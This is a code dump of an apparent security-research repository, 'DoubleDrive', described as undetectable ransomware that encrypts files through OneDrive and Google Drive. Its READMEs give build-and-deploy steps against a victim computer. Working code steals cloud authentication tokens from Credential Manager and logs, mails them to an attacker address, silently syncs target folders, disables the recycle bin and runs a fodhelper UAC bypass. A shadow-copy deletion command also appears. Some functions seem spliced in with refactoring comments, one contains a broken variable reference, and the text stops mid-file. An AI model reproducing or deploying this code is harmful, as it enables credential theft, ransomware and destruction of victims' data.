├── .gitignore ├── LICENSE ├── README.md ├── google_drive_doubledrive ├── README.md ├── add_sync_dir.py ├── config.py ├── config_setup.py ├── endpoint_takeover.py ├── google_drive_doubledrive.py ├── google_drive_info.py ├── token_extraction.py └── victim_info_key.py ├── onedrive_doubledrive ├── README.md ├── config.py ├── config_setup.py ├── endpoint_takeover.py ├── follow_attacker_commands.py └── onedrive_doubledrive.py ├── requirements.txt ├── setup.py └── src └── doubledrive ├── __init__.py ├── cloud_drive ├── __init__.py ├── cloud_drive.py ├── google_drive │ ├── __init__.py │ ├── google_drive.py │ └── google_drive_item.py └── onedrive │ ├── __init__.py │ ├── onedrive.py │ └── onedrive_item.py ├── cloud_ransomware ├── __init__.py ├── cloud_drive_ransomware.py ├── google_drive_ransomware.py └── onedrive_ransomware.py └── endpoint_takeover_utils ├── __init__.py ├── endpoint_info ├── __init__.py └── onedrive │ ├── __init__.py │ └── onedrive_info.py ├── reparse_points ├── __init__.py ├── reparse_points.py └── reparse_structs.py ├── temp_email.py └── token_extraction ├── __init__.py └── onedrive ├── __init__.py ├── odl_parser ├── __init__.py ├── odl.py └── odl_LICENSE.md └── onedrive_token_extraction.py /.gitignore: -------------------------------------------------------------------------------- 1 | # Byte-compiled / optimized / DLL files 2 | __pycache__/ 3 | *.py[cod] 4 | *$py.class 5 | 6 | # C extensions 7 | *.so 8 | 9 | # Distribution / packaging 10 | .Python 11 | build/ 12 | develop-eggs/ 13 | dist/ 14 | downloads/ 15 | eggs/ 16 | .eggs/ 17 | lib/ 18 | lib64/ 19 | parts/ 20 | sdist/ 21 | var/ 22 | wheels/ 23 | pip-wheel-metadata/ 24 | share/python-wheels/ 25 | *.egg-info/ 26 | .installed.cfg 27 | *.egg 28 | MANIFEST 29 | 30 | # PyInstaller 31 | # Usually these files are written by a python script from a template 32 | # before PyInstaller builds the exe, so as to inject date/other infos into it. 
33 | *.manifest 34 | *.spec 35 | 36 | # Installer logs 37 | pip-log.txt 38 | pip-delete-this-directory.txt 39 | 40 | # Unit test / coverage reports 41 | htmlcov/ 42 | .tox/ 43 | .nox/ 44 | .coverage 45 | .coverage.* 46 | .cache 47 | nosetests.xml 48 | coverage.xml 49 | *.cover 50 | *.py,cover 51 | .hypothesis/ 52 | .pytest_cache/ 53 | 54 | # Translations 55 | *.mo 56 | *.pot 57 | 58 | # Django stuff: 59 | *.log 60 | local_settings.py 61 | db.sqlite3 62 | db.sqlite3-journal 63 | 64 | # Flask stuff: 65 | instance/ 66 | .webassets-cache 67 | 68 | # Scrapy stuff: 69 | .scrapy 70 | 71 | # Sphinx documentation 72 | docs/_build/ 73 | 74 | # PyBuilder 75 | target/ 76 | 77 | # Jupyter Notebook 78 | .ipynb_checkpoints 79 | 80 | # IPython 81 | profile_default/ 82 | ipython_config.py 83 | 84 | # pyenv 85 | .python-version 86 | 87 | # pipenv 88 | # According to pypa/pipenv#598, it is recommended to include Pipfile.lock in version control. 89 | # However, in case of collaboration, if having platform-specific dependencies or dependencies 90 | # having no cross-platform support, pipenv may install dependencies that don't work, or not 91 | # install all needed dependencies. 92 | #Pipfile.lock 93 | 94 | # PEP 582; used by e.g. 
github.com/David-OConnor/pyflow 95 | __pypackages__/ 96 | 97 | # Celery stuff 98 | celerybeat-schedule 99 | celerybeat.pid 100 | 101 | # SageMath parsed files 102 | *.sage.py 103 | 104 | # Environments 105 | .env 106 | .venv 107 | env/ 108 | venv/ 109 | ENV/ 110 | env.bak/ 111 | venv.bak/ 112 | 113 | # Spyder project settings 114 | .spyderproject 115 | .spyproject 116 | 117 | # Rope project settings 118 | .ropeproject 119 | 120 | # mkdocs documentation 121 | /site 122 | 123 | # mypy 124 | .mypy_cache/ 125 | .dmypy.json 126 | dmypy.json 127 | 128 | # Pyre type checker 129 | .pyre/ 130 | 131 | # VSCODE 132 | .vscode/* 133 | 134 | # Local History for Visual Studio Code 135 | .history/ 136 | 137 | # Built Visual Studio Code Extensions 138 | *.vsix 139 | 140 | # OneDrive's DoubleDrive generated options 141 | onedrive_doubledrive/config.yaml -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | BSD 3-Clause License 2 | 3 | Copyright (c) 2022, SafeBreach Labs 4 | All rights reserved. 5 | 6 | Redistribution and use in source and binary forms, with or without 7 | modification, are permitted provided that the following conditions are met: 8 | 9 | 1. Redistributions of source code must retain the above copyright notice, this 10 | list of conditions and the following disclaimer. 11 | 12 | 2. Redistributions in binary form must reproduce the above copyright notice, 13 | this list of conditions and the following disclaimer in the documentation 14 | and/or other materials provided with the distribution. 15 | 16 | 3. Neither the name of the copyright holder nor the names of its 17 | contributors may be used to endorse or promote products derived from 18 | this software without specific prior written permission. 
19 | 20 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 21 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 22 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 23 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 24 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 25 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 26 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 27 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 28 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 29 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # DoubleDrive 2 | A fully-undetectable ransomware that utilizes Cloud Drive Services to encrypt target files. Presented at Black Hat USA 2023 Briefing under the title - [**One Drive, Double Agent: Clouded OneDrive Turns Sides**](https://www.blackhat.com/us-23/briefings/schedule/index.html#one-drive-double-agent-clouded-onedrive-turns-sides-32695) 3 | 4 | ## DoubleDrive Python Package 5 | (Tested only on python version 3.11.4) 6 | 7 | Implements most of the logic and tools that a DoubleDrive variant needs. 
In order to create a DoubleDrive variant for a certain cloud storage service, the creator must create 2 different executables using this library's tools: 8 | * An endpoint takeover executable, implements: 9 | * Undetectable legitimate logic that syncs local target paths from the target computer to the cloud storage service using a built-in feature of the local cloud storage app 10 | * Exfiltration of the stolen authentication information so the target local paths become accessible from the cloud storage service API 11 | * A DoubleDrive ransomware executable, implements: 12 | * Collection of the exfiltrated authentication information that was sent by the endpoint takeover executable 13 | * Encryption of all target files by sending API requests to the cloud storage service 14 | 15 | 16 | ## Specific Cloud Storage Services Implementations of DoubleDrive: 17 | ### OneDrive 18 | Go into ./onedrive_doubledrive for the specific OneDrive variant. 19 | You can read how to use it here: [OneDrive DoubleDrive README](onedrive_doubledrive/README.md) 20 | 21 | ### Google Drive 22 | Go into ./google_drive_doubledrive for the specific Google Drive variant. 23 | You can read how to use it here: [Google Drive DoubleDrive README](google_drive_doubledrive/README.md) 24 | 25 | ## Author - Or Yair 26 | * LinkedIn - [Or Yair](https://www.linkedin.com/in/or-yair/) 27 | * Twitter - [@oryair1999](https://twitter.com/oryair1999) 28 | -------------------------------------------------------------------------------- /google_drive_doubledrive/README.md: -------------------------------------------------------------------------------- 1 | # Google Drive DoubleDrive 2 | A DoubleDrive variant that uses Google Drive to encrypt local files remotely. 3 | 4 | ## How to use 5 | 1. Make sure you clone the DoubleDrive repo and install the DoubleDrive python package. If you are currently in the google_drive_doubledrive folder then run: 6 | ```cmd 7 | pip install ../ 8 | ``` 9 | 2. 
Use `config_setup.py` to setup the exact configuration you want for the ransomware. For example: 10 | ```cmd 11 | python .\config_setup.py --temp-email --target-paths C:\Users\Admin\Documents C:\Users\Admin\Desktop 12 | ``` 13 | 3. While you are in the google_drive_doubledrive folder, run: 14 | ```cmd 15 | pyinstaller --onefile --add-data "config.yaml;." .\endpoint_takeover.py; pyinstaller --onefile --add-data "config.yaml;." .\google_drive_doubledrive.py 16 | ``` 17 | 4. A folder named `dist` will be created. Inside you can find `endpoint_takeover.exe` and `google_drive_doubledrive.exe` 18 | 5. Transfer `endpoint_takeover.exe` to the victim computer and run it. This will change Google Drive's settings database to sync the target paths to encrypt. It will also extract the token of the currently logged in Google Drive account and exfiltrate it by sharing it with the email address chosen in the configuration setup stage. 19 | > Note - If you chose a temporary email address you should continue to the next step as soon as possible because the generated temporary email address that DoubleDrive uses works for a limited amount of time. 20 | 1. 
def restart_google_drive():
    """Kill every Google Drive process owned by the current user, then relaunch it.

    Killing only the current user's GoogleDriveFS.exe instances avoids touching
    other logged-in users' sessions; the official launch script then brings the
    app back up so it re-reads its settings databases.
    """
    current_user = win32api.GetUserNameEx(win32con.NameSamCompatible)

    for proc in psutil.process_iter():
        # Ownership check first: username() may be denied for other users'
        # processes, in which case the process is simply skipped.
        try:
            proc_owner = proc.username()
        except psutil.AccessDenied:
            continue

        if proc_owner == current_user and proc.name() == GOOGLE_DRIVE_PROCESS_NAME:
            proc.kill()

    launcher = subprocess.Popen(f"\"{GOOGLE_DRIVE_LAUNCH_SCRIPT_PATH}\"", stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
    launcher.wait()
g_configs = None
def get_configs():
    """Load the YAML configuration once and return the cached dict afterwards.

    Resolves config.yaml relative to sys._MEIPASS when running as a PyInstaller
    onefile bundle (data files are unpacked there), otherwise relative to this
    script's own directory.

    :return: the parsed configuration dictionary
    """
    global g_configs
    # Idiom fix: compare against None with `is not`, not `!=`.
    if g_configs is not None:
        return g_configs

    bundle_dir = getattr(sys, '_MEIPASS', os.path.abspath(os.path.dirname(__file__)))
    path_to_config_file = os.path.abspath(os.path.join(bundle_dir, "config.yaml"))

    with open(path_to_config_file, "r") as f:
        g_configs = yaml.safe_load(f)

    return g_configs
def create_config_file_from_args(args):
    """Translate parsed CLI arguments into the DoubleDrive config dict and dump it to config.yaml.

    :param args: argparse namespace produced by parse_args()
    """
    email_addr = get_temp_email() if args.temp_email else args.custom_email

    config = {
        ConfigKey.EXFILTRATION_EMAIL_ADDRESS.value: email_addr,
        ConfigKey.IS_TEMP_EMAIL.value: args.temp_email,
        ConfigKey.VICTIM_INFO_FILE_NAME.value: str(uuid.uuid4()),
        ConfigKey.TARGET_PATHS.value: args.target_paths,
        ConfigKey.SHOULD_SYNC_STARTUP_FOLDER.value: args.sync_startup_folder,
    }

    # A command-file name is only relevant when the startup folder is synced.
    if args.sync_startup_folder:
        config[ConfigKey.CMD_FILE.value] = str(uuid.uuid4())

    with open('config.yaml', 'w') as f:
        yaml.dump(config, f)
def disable_current_user_recycle_bin():
    """Enable the per-user "NoRecycleFiles" Explorer policy so Explorer deletes
    files immediately instead of moving them to the Recycle Bin.

    Fix: the original called winreg.SetValue(key, "NoRecycleFiles", 1), which
    raises TypeError — SetValue takes four arguments and can only write a
    REG_SZ default value of a *subkey*. The Explorer policy is a REG_DWORD
    *value* named "NoRecycleFiles" on the Explorer key, so SetValueEx is the
    correct API. OpenKey is also given KEY_WRITE, since its default read-only
    access would make the CreateKey call below fail.
    """
    hkcu_key = winreg.ConnectRegistry(None, winreg.HKEY_CURRENT_USER)
    with winreg.OpenKey(hkcu_key, r"Software\Microsoft\Windows\CurrentVersion\Policies", 0, winreg.KEY_WRITE) as policy_key:
        with winreg.CreateKey(policy_key, "Explorer") as explorer_policy_key:
            winreg.SetValueEx(explorer_policy_key, "NoRecycleFiles", 0, winreg.REG_DWORD, 1)
def add_google_drive_sync_dir(account_id: str, new_sync_dir_path: str):
    """Register a new mirrored-sync root in Google Drive's root_preference_sqlite.db.

    Inserts a row into the `roots` table (and bumps the `max_root_id` counter)
    so that, once GoogleDriveFS.exe restarts, it begins syncing
    ``new_sync_dir_path`` to the cloud under the given account.

    Fixes over the original:
    * SQL values are bound with `?` placeholders instead of f-string
      interpolation — a path or title containing a quote previously broke the
      statement (string-built SQL).
    * The DB connection is closed even when an intermediate statement raises.

    :param account_id: Google Drive account ID the new sync root belongs to
    :param new_sync_dir_path: absolute local path of the directory to sync
    """
    dir_name = os.path.basename(new_sync_dir_path)

    google_drive_db = sqlite3.connect(GOOGLE_DRIVE_ROOT_PREFERENCES_DB_PATH)
    try:
        max_ids_cursor = google_drive_db.execute(f"SELECT * from {GOOGLE_DRIVE_DB_MAX_IDS_TABLE}")
        record = max_ids_cursor.fetchone()

        # Keep the root-ID counter consistent with the row inserted below.
        # record[1] is presumed to be the counter's `value` column — matches
        # the UPDATE target; verify against the DriveFS schema on new versions.
        if record is not None:
            new_max_ids = record[1] + 1
            google_drive_db.execute(
                f"UPDATE {GOOGLE_DRIVE_DB_MAX_IDS_TABLE} set value = ? where id_type = 'max_root_id'",
                (new_max_ids,),
            )

        os_drive = pathlib.Path.home().drive + "\\"
        new_sync_dir_path_without_os_drive = new_sync_dir_path.replace(os_drive, "")
        # DriveFS stores the OS volume's GUID (the text between the braces of
        # the \\?\Volume{...}\ mount-point path) as the root's media_id.
        os_drive_guid_path = win32file.GetVolumeNameForVolumeMountPoint(os_drive)
        os_drive_uuid = os_drive_guid_path[os_drive_guid_path.find("{") + 1 : os_drive_guid_path.find("}")]
        google_drive_db.execute(
            f"INSERT INTO {GOOGLE_DRIVE_DB_ROOTS_TABLE} "
            "(media_id, title, root_path, account_token, sync_type, destination, medium, state, one_shot, is_my_drive, doc_id, last_seen_absolute_path) "
            "VALUES (?, ?, ?, ?, 1, 1, 1, 2, 0, 0, '', ?)",
            (os_drive_uuid, dir_name, new_sync_dir_path_without_os_drive, account_id, new_sync_dir_path),
        )
        google_drive_db.commit()
    finally:
        google_drive_db.close()
def get_paths_inodes(paths: list[str]):
    """Return a mapping from each path's "inode" (as a string) to the path itself.

    Google's local DBs call this value an inode, but on Windows it is actually
    the file ID; os.stat exposes it as st_ino on both platforms, so the lookup
    is the same as retrieving an inode number on Linux.
    """
    return {str(os.stat(target_path).st_ino): target_path for target_path in paths}
def get_sync_paths_google_drive_ids(sync_paths: list[str]):
    """Resolve each synced local path to its Google Drive cloud item ID.

    Chains three lookups against DriveFS's local databases:
    local path -> inode, inode -> stable_id, stable_id -> cloud item ID.

    :param sync_paths: local directory paths that were added as sync roots
    :return: dict mapping Google Drive item IDs to their local target paths
    """
    inodes_to_paths = get_paths_inodes(sync_paths)
    stable_ids_to_inodes = get_stable_ids_by_inodes(inodes_to_paths.keys())
    drive_ids_to_stable_ids = get_cloud_item_id_by_stable_id(stable_ids_to_inodes.keys())

    # Walk the chain backwards: cloud item ID -> stable_id -> inode -> path.
    return {
        drive_item_id: inodes_to_paths[stable_ids_to_inodes[stable_id]]
        for drive_item_id, stable_id in drive_ids_to_stable_ids.items()
    }
time.sleep(SYNC_DELAY_AFTER_GOOGLE_DRIVE_RESTART) 173 | try: 174 | google_drive_ids_to_target_paths = get_sync_paths_google_drive_ids(configs[ConfigKey.TARGET_PATHS.value]) 175 | except LookupError: 176 | # Sometimes Google Drive fails to start after restart 177 | # If Google Drive is not running: 178 | if 0 == len(get_current_user_google_drive_pids()): 179 | launch_google_drive() 180 | continue 181 | else: 182 | break 183 | 184 | account_token = extract_google_drive_account_token_by_id(google_drive_info.all_accounts_preferences[0].id) 185 | 186 | victim_info = { 187 | VictimInfoKey.COMPUTER_ITEM_ID.value: google_drive_info.all_accounts_preferences[0].machine_root_doc_id, 188 | VictimInfoKey.TOKEN.value: account_token, 189 | VictimInfoKey.IDS_TO_TARGET_PATHS.value: google_drive_ids_to_target_paths 190 | } 191 | 192 | google_drive_session = GoogleDrive() 193 | google_drive_session.login_using_token(account_token) 194 | 195 | victim_info_file_name = str(uuid.uuid4()) 196 | victim_info_file = google_drive_session.create_file(f"/{victim_info_file_name}", yaml.dump(victim_info)) 197 | victim_info_file = google_drive_session.trash_item(victim_info_file) 198 | google_drive_session.make_item_public(victim_info_file) 199 | google_drive_session.send_item_to_email(victim_info_file, configs[ConfigKey.EXFILTRATION_EMAIL_ADDRESS.value]) 200 | 201 | 202 | if "__main__" == __name__: 203 | main() -------------------------------------------------------------------------------- /google_drive_doubledrive/google_drive_doubledrive.py: -------------------------------------------------------------------------------- 1 | import yaml 2 | import requests 3 | 4 | from doubledrive.endpoint_takeover_utils.temp_email import TempEmail 5 | from doubledrive.cloud_drive.google_drive.google_drive import GoogleDrive 6 | from doubledrive.cloud_drive.google_drive.google_drive_item import GoogleDriveFileItem 7 | from doubledrive.cloud_ransomware.google_drive_ransomware import GoogleDriveRansomware 8 | 
def get_victim_info_file_id_from_email(email: str) -> str:
    """Read the newest message in the exfiltration mailbox and parse the shared
    Google Drive file ID out of its share link.

    Fix: the original ignored str.find() returning -1, so a message without a
    share link (or with a malformed one) silently produced a garbage or empty
    file ID; both cases now raise LookupError.

    :param email: address of the mailbox the victim-info file was shared with
    :return: the Google Drive file ID embedded in the share link
    :raises LookupError: if the newest message holds no usable share link
    """
    temp_email = TempEmail(email)
    messages = temp_email.get_messages()
    content = messages[0].content

    file_link_index = content.find(EMAIL_SHARE_LINK_BEGINING)
    if file_link_index == -1:
        raise LookupError("No Google Drive share link found in the newest email message")

    file_id_index = file_link_index + len(EMAIL_SHARE_LINK_BEGINING)
    slash_after_file_id_index = content.find("/", file_id_index)
    if slash_after_file_id_index == -1:
        raise LookupError("Malformed Google Drive share link in the newest email message")

    return content[file_id_index:slash_after_file_id_index]
class GoogleDriveInfo:
    """Per-account Google Drive (DriveFS) preferences read from the registry.

    Parses the JSON blob stored in the current user's
    HKCU\\Software\\Google\\DriveFS "PerAccountPreferences" value and exposes
    one GoogleDrivePerAccountPreferences entry per signed-in account.
    """

    def __init__(self) -> None:
        # One entry per signed-in Google Drive account.
        self.all_accounts_preferences: list[GoogleDrivePerAccountPreferences] = []

        hkcu_key = winreg.ConnectRegistry(None, winreg.HKEY_CURRENT_USER)
        # Fix: handle was misleadingly named "onedrive_personal_reg_key" — a
        # copy-paste leftover from the OneDrive variant; this key is DriveFS's.
        with winreg.OpenKey(hkcu_key, r"Software\Google\DriveFS") as google_drive_reg_key:
            all_accounts_preferences_string = winreg.QueryValueEx(google_drive_reg_key, "PerAccountPreferences")[0]
        json_all_accounts_preferences = json.loads(all_accounts_preferences_string)["per_account_preferences"]

        for json_account_preferences in json_all_accounts_preferences:
            account_value = json_account_preferences["value"]
            account_preferences = GoogleDrivePerAccountPreferences(
                json_account_preferences["key"],
                account_value.get("machine_root_doc_id", None),
                account_value.get("mount_point_path", None),
            )
            self.all_accounts_preferences.append(account_preferences)
CRED_TYPE_GENERIC = 1
# OAuth access tokens issued to Google Drive start with this literal prefix.
GOOGLE_DRIVE_TOKEN_START_BYTES = b"ya29"
# The two bytes encoding the token length sit immediately before the token.
TOKEN_LEN_MULTIPLIERS_DISTANCE_FROM_TOKEN = -2
GOOGLE_DRIVE_CRED_NAME_PREFIX = "DriveFS_"


def extract_google_drive_account_token_by_id(account_id: str):
    """Extract a Google Drive OAuth token from the Windows Credential Manager.

    DriveFS stores a generic credential named "DriveFS_<account_id>". The token
    inside the blob starts with the literal bytes "ya29"; its length is encoded
    in the two bytes just before the token as the *product* of the two byte
    values (empirically derived — verify on new DriveFS versions).

    Fix: a blob without the "ya29" marker previously made find() return -1 and
    the slicing below yield garbage; it now raises LookupError instead.

    :param account_id: Google Drive account ID whose credential to read
    :return: the token formatted as an HTTP "Bearer" Authorization header value
    :raises LookupError: if no token marker is present in the credential blob
    """
    cred_blob = win32cred.CredRead(f"{GOOGLE_DRIVE_CRED_NAME_PREFIX}{account_id}", CRED_TYPE_GENERIC)["CredentialBlob"]
    token_start_index = cred_blob.find(GOOGLE_DRIVE_TOKEN_START_BYTES)
    if token_start_index == -1:
        raise LookupError("Could not find a Google Drive token in the credential blob")

    token_len_multipliers_index = token_start_index + TOKEN_LEN_MULTIPLIERS_DISTANCE_FROM_TOKEN
    # Indexing a bytes object already yields an int; no int.from_bytes needed.
    token_len_multiplier1 = cred_blob[token_len_multipliers_index]
    token_len_multiplier2 = cred_blob[token_len_multipliers_index + 1]
    token_len = token_len_multiplier1 * token_len_multiplier2
    token = cred_blob[token_start_index : token_start_index + token_len].decode()
    return f"Bearer {token}"
If you are currently in the onedrive_doubledrive folder then run: 6 | ```cmd 7 | pip install ../ 8 | ``` 9 | 2. Use `config_setup.py` to setup the exact configuration you want for the ransomware. For example: 10 | ```cmd 11 | python .\config_setup.py --temp-email --target-paths C:\Users\Admin\Documents C:\Users\Admin\Desktop 12 | ``` 13 | 3. While you are in the onedrive_doubledrive folder, run: 14 | ```cmd 15 | pyinstaller --onefile --add-data "config.yaml;." .\endpoint_takeover.py; pyinstaller --onefile --add-data "config.yaml;." .\onedrive_doubledrive.py 16 | ``` 17 | In case you mentioned the `--onedrive-binaries-junction` flag in the previous stage then you should also run: 18 | ```cmd 19 | pyinstaller --onefile --add-data "config.yaml;." .\follow_attacker_commands.py 20 | ``` 21 | 4. A folder named `dist` will be created. Inside you can find `endpoint_takeover.exe` and `onedrive_doubledrive.exe` 22 | 5. Transfer `endpoint_takeover.exe` to the victim computer and run it. This will create junctions in the OneDrive sync folder that point towards the target folders the contain files to encrypt. It will also extract the WLID token of the OneDrive account and exfiltrate it by sharing it with the email address chosen in the configuration setup stage. 23 | > Note - If you chose a temporary email address you should continue to the next step as soon as possible because the generated temporary email address that DoubleDrive uses works for a limited amount of time. 24 | 6. Execute `onedrive_doubledrive` with the preferred flags on the attacker's computer. For example: 25 | ```cmd 26 | onedrive_doubledrive.exe --remote-ransomware 27 | ``` 28 | 7. In case you passed the `--onedrive-binaries-junction` flag to the `config_setup.py` script in the configuration setup stage, then you can: 29 | 1. Replace the SharePoint executable located in OneDrive's installation folder by running: 30 | ```cmd 31 | onedrive_doubledrive.exe --replace-sharepoint 32 | ``` 33 | 2. 
Execute commands using the `--run-command` flag. You can also run them after a UAC bypass was executed if you add the `--command-uac-bypass` flag. For example: 34 | ```cmd 35 | onedrive_doubledrive.exe --run-command "vssadmin delete shadows /all /quiet" --command-uac-bypass 36 | ``` 37 | 38 | ## Update: SharePoint Executable Command Execution Technique 39 | As you can read in the blog post I published about this research, the technique of replacing the SharePoint executable located in OneDrive's installation folder depends on the fact that `OneDrive.exe` runs `Microsoft.SharePoint.exe` when it starts. After I created this technique, and I reported my findings to all the relevant vendors, it now seems that in newer versions of OneDrive the `Microsoft.SharePoint.exe` executable is not run anymore every time `OneDrive.exe` starts. Seems like there are other triggers for `OneDrive.exe` to run `Microsoft.SharePoint.exe`, which I have not investigated. If you wish, you can alter DoubleDrive's code to write the `follow_attacker_commands.exe` executable to the current user's startup folder instead. 
-------------------------------------------------------------------------------- /onedrive_doubledrive/config.py: -------------------------------------------------------------------------------- 1 | import yaml 2 | import os 3 | import sys 4 | from enum import Enum 5 | 6 | class ConfigKey(Enum): 7 | TOKEN_DST_EMAIL_ADDRESS = 1 8 | IS_TEMP_EMAIL = 2 9 | TOKEN_FILE_NAME = 3 10 | JUNCTION_NAMES_TO_TARGET_PATHS = 4 11 | SHOULD_CREATE_ONEDRIVE_BINARIES_JUNCTION = 5 12 | CMD_FILE_NAME = 6 13 | QUICK_DELETE = 7 14 | ONEDRIVE_VERSION_FOLDER_JUNCTION_NAME = 8 15 | 16 | 17 | g_configs = None 18 | def get_configs(): 19 | global g_configs 20 | if None != g_configs: 21 | return g_configs 22 | 23 | bundle_dir = getattr(sys, '_MEIPASS', os.path.abspath(os.path.dirname(__file__))) 24 | path_to_config_file = os.path.abspath(os.path.join(bundle_dir, "config.yaml")) 25 | 26 | with open(path_to_config_file, "r") as f: 27 | configs = yaml.safe_load(f) 28 | g_configs = configs 29 | 30 | return g_configs -------------------------------------------------------------------------------- /onedrive_doubledrive/config_setup.py: -------------------------------------------------------------------------------- 1 | import yaml 2 | import os 3 | import argparse 4 | import uuid 5 | 6 | from config import ConfigKey 7 | from doubledrive.endpoint_takeover_utils.temp_email import TempEmail 8 | 9 | def parse_args(): 10 | parser = argparse.ArgumentParser(description="Options setup for OneDrive DoubleDrive") 11 | 12 | group = parser.add_mutually_exclusive_group(required=True) 13 | group.add_argument("--temp-email", help="If specified, sets DoubleDrive to exfiltrate the windows live token over a temp email", action="store_true") 14 | group.add_argument("--custom-email", help="If specified, sets DoubleDrive to exfiltrate the windows live token over the specified email", type=str) 15 | 16 | parser.add_argument("--quick-delete", help="If specified, starts by deleting the target files instead of overwriting 
them. In the end of the process, the endpoint_takeover executable will start overwriting the free space on the disk in order to make sure files cannot be recovered", action="store_true") 17 | parser.add_argument("--onedrive-binaries-junction", help="If specified, set DoubleDrive to create a junction to the installation folder of OneDrive's latest version of the target", action="store_true") 18 | parser.add_argument("--target-paths", nargs="+", help="The list of directory paths to encrypt using OneDrive", type=str, required=True) 19 | 20 | return parser.parse_args() 21 | 22 | 23 | def get_temp_email(): 24 | temp_email = TempEmail() 25 | return f"{temp_email.username}@{temp_email.domain}" 26 | 27 | 28 | def main(): 29 | args = parse_args() 30 | email_addr = None 31 | if args.temp_email: 32 | email_addr = get_temp_email() 33 | else: 34 | email_addr = args.custom_email 35 | 36 | junction_names_to_target_paths = {} 37 | for target_path in args.target_paths: 38 | junction_names_to_target_paths[str(uuid.uuid4())] = target_path 39 | 40 | config = { 41 | ConfigKey.TOKEN_DST_EMAIL_ADDRESS.value: email_addr, 42 | ConfigKey.IS_TEMP_EMAIL.value: args.temp_email, 43 | ConfigKey.TOKEN_FILE_NAME.value: str(uuid.uuid4()), 44 | ConfigKey.JUNCTION_NAMES_TO_TARGET_PATHS.value: junction_names_to_target_paths, 45 | ConfigKey.SHOULD_CREATE_ONEDRIVE_BINARIES_JUNCTION.value: args.onedrive_binaries_junction, 46 | ConfigKey.CMD_FILE_NAME.value: str(uuid.uuid4()), 47 | ConfigKey.QUICK_DELETE.value: args.quick_delete 48 | } 49 | if args.onedrive_binaries_junction: 50 | config[ConfigKey.ONEDRIVE_VERSION_FOLDER_JUNCTION_NAME.value] = str(uuid.uuid4()) 51 | 52 | with open('config.yaml', 'w') as f: 53 | yaml.dump(config, f) 54 | 55 | 56 | 57 | if "__main__" == __name__: 58 | main() -------------------------------------------------------------------------------- /onedrive_doubledrive/endpoint_takeover.py: -------------------------------------------------------------------------------- 1 | import os 
2 | 3 | 4 | from config import get_configs, ConfigKey 5 | from doubledrive.cloud_drive.onedrive.onedrive import OneDrive 6 | from doubledrive.endpoint_takeover_utils.reparse_points.reparse_points import create_mount_point 7 | from doubledrive.endpoint_takeover_utils.endpoint_info.onedrive.onedrive_info import get_onedrive_info 8 | from doubledrive.endpoint_takeover_utils.token_extraction.onedrive.onedrive_token_extraction import steal_onedrive_wlid_token 9 | 10 | 11 | def main(): 12 | onedrive_info = get_onedrive_info() 13 | configs = get_configs() 14 | 15 | if configs[ConfigKey.SHOULD_CREATE_ONEDRIVE_BINARIES_JUNCTION.value]: 16 | junctions_names_to_target_paths = configs[ConfigKey.JUNCTION_NAMES_TO_TARGET_PATHS.value].copy() 17 | onedrive_installation_folder_junc_name = configs[ConfigKey.ONEDRIVE_VERSION_FOLDER_JUNCTION_NAME.value] 18 | junctions_names_to_target_paths[onedrive_installation_folder_junc_name] = onedrive_info.version_installation_folder 19 | else: 20 | junctions_names_to_target_paths = configs[ConfigKey.JUNCTION_NAMES_TO_TARGET_PATHS.value] 21 | 22 | print("Creating junctions to targets") 23 | for junction_name, target_path in junctions_names_to_target_paths.items(): 24 | junction_path = os.path.join(onedrive_info.sync_folder, junction_name) 25 | create_mount_point(junction_path, target_path) 26 | 27 | print("Extracting Windows Live ID token from OneDrive's logs") 28 | windows_live_token = steal_onedrive_wlid_token() 29 | if None == windows_live_token: 30 | print("Did not find the WLID token") 31 | return 1 32 | onedrive_session = OneDrive() 33 | onedrive_session.login_using_token(windows_live_token) 34 | print("Uploading token to OneDrive") 35 | onedrive_token_file_item = onedrive_session.create_file(f"/{configs[ConfigKey.TOKEN_FILE_NAME.value]}", windows_live_token) 36 | print("Sending token file to the configured email address using OneDrive API") 37 | 38 | # OneDrive has some bugs with this API request and sometimes an email is just not sent, 
without any indication for why. 39 | # In case that happens to you, you can just replace this exfiltration methos with another one. 40 | onedrive_session.send_item_to_email(onedrive_token_file_item, configs[ConfigKey.TOKEN_DST_EMAIL_ADDRESS.value]) 41 | 42 | 43 | 44 | if "__main__" == __name__: 45 | main() -------------------------------------------------------------------------------- /onedrive_doubledrive/follow_attacker_commands.py: -------------------------------------------------------------------------------- 1 | import winreg 2 | import os 3 | import time 4 | import json 5 | 6 | from config import get_configs, ConfigKey 7 | 8 | def run_command_with_uac_bypass(command): 9 | hkcu_key = winreg.ConnectRegistry(None, winreg.HKEY_CURRENT_USER) 10 | with winreg.CreateKeyEx(hkcu_key, "Software\\Classes\\ms-settings\\Shell\\Open") as reg_key: 11 | winreg.SetValueEx(command_key, "DelegateExecute", 0, winreg.REG_SZ, "") 12 | 13 | with winreg.CreateKeyEx(reg_key, "command") as command_key: 14 | winreg.SetValue(command_key, None, winreg.REG_SZ, command) 15 | 16 | os.system("fodhelper.exe") 17 | 18 | def get_onedrive_sync_folder(): 19 | hkcu_key = winreg.ConnectRegistry(None, winreg.HKEY_CURRENT_USER) 20 | with winreg.OpenKey(hkcu_key, "Software\\Microsoft\\OneDrive\\Accounts\\Personal") as onedrive_personal_reg_key: 21 | onedrive_sync_folder = winreg.QueryValueEx(onedrive_personal_reg_key, "UserFolder")[0] 22 | return onedrive_sync_folder 23 | 24 | def main(): 25 | file_name = os.path.join(get_onedrive_sync_folder(), 